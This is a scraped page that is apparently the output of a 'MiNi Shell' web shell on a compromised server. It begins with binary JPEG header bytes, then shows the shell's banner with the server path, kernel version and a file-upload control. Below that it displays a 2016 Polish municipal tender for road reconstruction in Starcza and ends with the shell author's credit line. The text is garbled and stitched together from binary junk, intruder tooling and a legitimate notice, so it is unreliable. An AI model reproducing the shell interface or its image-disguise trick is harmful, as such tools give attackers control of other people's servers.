JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/143297-N-2016.html

<p class="kh_header"><b>Starcza: Przebudowa  dróg gminnych ul. Zdrowej i ul. Stawowej w miejscowości Własna</b><br>
<b>Numer ogłoszenia: 143297 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starcza , ul. Gminna 4, 42-261 Starcza, woj. śląskie, tel. 034 3140334, faks 034 3140334.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.starcza.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  dróg gminnych ul. Zdrowej i ul. Stawowej w miejscowości Własna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa dróg gminnych ul. Zdrowej i ul. Stawowej  w miejscowości Własna.
a) zakres przebudowy ul. Zdrowej
- przebudowa  konstrukcji jezdni na długości 1140,28m
- poszerzenie  jezdni do szerokości 5,50m
- adaptacja istniejącego chodnika szerokości 2,70m na odcinku od km 0+000 do  0+075,32  po 
 stronie północnej jezdni (strona lewa)
- budowa chodnika szerokości 2,5 m z możliwością korzystania przez rowerzystów od km 0+000 do 1+140,28 o nawierzchni z kostki brukowej po stronie południowej
- przebudowa zjazdów  na posesje strony południowej w szerokościach istniejących bram                            o nawierzchni brukowej (kostka) i krawężnikach obniżonych najazdowych
- wzmocnienie pobocza strony północnej warstwą kruszywa na szerokości 1,00m na całej długości drogi
- wzmocnienie istniejących wjazdów na posesje i przylegające grunty warstwą kruszywa                              z rozbiórek (kruszywo z frezowania nawierzchni bitumicznej)
- rozbiórka istniejących przepustów pod zjazdami strony południowej
- przebudowa przepustów rurowych o zróżnicowanych przekrojach od O 200 do O 400 mm                           z jednoczesnym udrożnieniem dna rowów
- wykonanie odwodnienia rowem otwartym i częściowo rowem krytym 
- dostosowanie istniejącego mostu w ciągu drogi  do parametrów drogi przed i za  obiektem oraz do przeprowadzenia ciągu pieszo - rowerowego
b) Zakres przebudowy ul. Stawowej 
- przebudowa  nawierzchni jezdni do szerokości 5,50m z  dostosowaniem konstrukcji do kategorii KR3 na długości 260,26m
- budowa odcinka  chodnika (przedłużenie istniejącego)  szerokości 1,5m o nawierzchni z kostki brukowej do zlokalizowanego przystanku autobusowego (peron) po stronie północno - wschodniej
- adaptacja istniejącego chodnika szerokości 2,00 m na odcinku od km 0+000 do 0+187,58
- adaptacja istniejących zjazdów o nawierzchni z kostki brukowej
- wzmocnienie istniejącego pobocza na szerokości 1,00 m warstwą kruszywa z rozbiórek
- udrożnienie dna rowu istniejącego i obustronnych skarp, 

Założenia konstrukcyjne i parametry techniczne:
Dla istniejących warunków gruntowych  i kategorii ruchu KR3 zaprojektowano nawierzchnię:
- warstwa ścieralna  z betonu asfaltowego AC 11S o  grubości 4cm
- warstwa wiążąca z betonu asfaltowego AC 16W o grubości 5 cm
- podbudowa zasadnicza z betonu asfaltowego AC 22P o grubości 7cm
- podbudowa  pomocnicza niezwiązana z kruszywa łamanego 0/63mm grubości 22cm
- warstwa mrozoodporna z gruntu niewysadzinowego grubości 15cm.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują wykonanie                           tj. zakończenie  w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej jednej roboty budowlanej w zakresie budowy, przebudowy lub remontu dróg  o wartości nie mniejszej niż 1mln zł brutto.
W przypadku  robót, których wartość została wyrażona w umowie w innej walucie  niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia  robót (w przypadku robót rozliczanych wyłącznie w walutach  innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobą(ami), która(e) będzie(będą) pełnić funkcję kierownika budowy, posiadającą(ymi) uprawnienia do kierowania robotami budowlanymi  w zakresie branży drogowej oraz mostowej.

Uwaga:
   Kierownik budowy powinien  posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą  z  dnia  07 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2016r. poz.290) oraz rozporządzeniem Ministra Infrastruktury i  Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jedn. Dz. U z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
  Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone  w art. 12 ust. 1 ustawy mogą  również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na  zasadach określonych w przepisach odrębnych. 
  Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują:
     a) posiadanie środków finansowych lub zdolności kredytowej o  łącznej kwocie w wysokości co najmniej  1 mln  zł.
     b) posiadanie ubezpieczenia od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 mln zł.
Dokonanie oceny spełniania warunków udziału w postępowaniu będzie się odbywać metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dowody (zgodnie z §1 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane) dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów, określone w punktach 6.1 do 6.4 SIWZ

1.1.	W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenie  z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników.

  1.2.  Dokumenty, o których mowa w  punktach  6.1c), 6.1d), 6.2a), 6.2b), 6.3a) SIWZ  
          winny być złożone w oryginale. Dokumenty, o których mowa w 6.1a, 6.1b), 6.3b),                
           6.4a), 6.4b) SIWZ winny być złożone w oryginale lub kopii poświadczonej za  
           zgodność  z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń                
           woli w imieniu Wykonawcy.
           Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na  
           język polski.
 
   1.3 W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) 
          lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi 
          złożyć dokumenty wymienione w punkcie 6.1 SIWZ (lub w punkcie 6.5.2 SIWZ -  jeżeli 
           Wykonawca ma siedzibę lub miejsce zamieszkania  poza terytorium Rzeczypospolitej 
           Polskiej wraz dokumentami wymienionymi w punkcie 6.1c i  6.1d specyfikacji).
           Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić  
           pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo do  
           reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne  
           pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli 
           każdego  ze wspólników.
           Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte 
            wykonanie zamówienia określoną w art. 366 Kodeksu cywilnego.

   1.4  Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na 
           wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych   
            podmiotów, niezależnie od charakteru prawnego łączących  go z nimi stosunków.   
            Wykonawca w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż 
            będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić  
            pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
            zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Ww.  
            zobowiązanie musi być przedstawione w oryginale.

   1.5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz   
           w przypadku, gdy Wykonawca wskazuje  spełnianie warunków, o których mowa w 
            punktach 5.2, 5.3 oraz 5.4  SIWZ polega na zasobach innych podmiotów, 
            kopie dokumentów  potwierdzających spełnianie  tych warunków, dotyczących 
            odpowiednio wspólników konsorcjum lub innych podmiotów powinny być  
            poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy      
            w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, 
            jeżeli będzie  miał do tej czynności upoważnienie, a w odniesieniu do innych 
             podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w 
             odniesieniu do dotyczących go dokumentów).

  1.6.  Zgodnie z  art. 26 ust. 2c Jeżeli z uzasadnionej przyczyny Wykonawca nie może  
           przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej  
           wymaganych przez Zamawiającego, może przedstawić inny dokument, który w  
           wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego 
           warunku.
            Zgodnie z Rozporządzeniem o dokumentach, jeżeli Wykonawca 
            wykazując spełnienie warunku, o którym mowa w punkcie 5.4 SIWZ polega na 
            zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 
            2b ustawy Pzp, wymaga się przedłożenia ww. informacji dotyczącej tych podmiotów.

2. Inne dokumenty wymagane przez Zamawiającego
a) Wypełniony Formularz Oferta, stanowiący załącznik nr 2 do SIWZ.
Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli  upoważnienie takie nie wynika wprost               z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Długość okresu gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:

1.	Zmiana umowy możliwa będzie w szczególności, gdy wystąpią:
1)	przypadki przewidziane prawem budowlanym
2)	obiektywne zdarzenia uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy
3)	uzasadniona konieczność wykonania robót dodatkowych, zamiennych lub konieczność rezygnacji z części robót w przypadku zaistnienia  okoliczności, której strony nie przewidziały przy zawarciu umowy
4)	zmiana podatku VAT
5)	zmiana podwykonawcy, kierownika  budowy lub osób nadzorujących realizację umowy po stronie Zamawiającego
6)	oczywiste omyłki pisarskie i rachunkowe w treści umowy
2.	Każdy z przypadków wymienionych w ppkt 1,2 i 3 udokumentowany zostanie stosownym protokołem, podpisanym przez Strony
3.	W przypadku zaistnienia okoliczności, o których mowa powyżej termin wykonania przedmiotu umowy może ulec zmianie proporcjonalnie do zaistniałej sytuacji w  razie rezygnacji  z wykonania części robót, wynagrodzenie Wykonawcy zostanie odpowiednio zmniejszone o wielkość wyceny tych robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starcza.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia wraz z drukiem oferty można uzyskać w siedzibie Zamawiającego tj. Urzędzie Gminy w Starczy,                   ul. Gminna 4, pok. nr 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 10:00, miejsce: Miejsce składania ofert: Urząd Gminy w Starczy, ul. Gminna 4, 42-261 Starcza pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia pn.: Przebudowa  dróg gminnych ul. Zdrowej i ul. Stawowej w miejscowości Własna  współfinansowany jest ze środków Unii Europejskiej dla operacji typu   Budowa  lub modernizacja dróg lokalnych w ramach poddziałania  rodzajów małej infrastruktury, w tym inwestycji w energię  odnawialną Wsparcie  inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich i w oszczędzanie   energii  w ramach działania Podstawowe  usługi i odnowa  wsi na obszarach wiejskich objętego  Programem Rozwoju Obszarów Wiejskich na lata 2014-2020..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com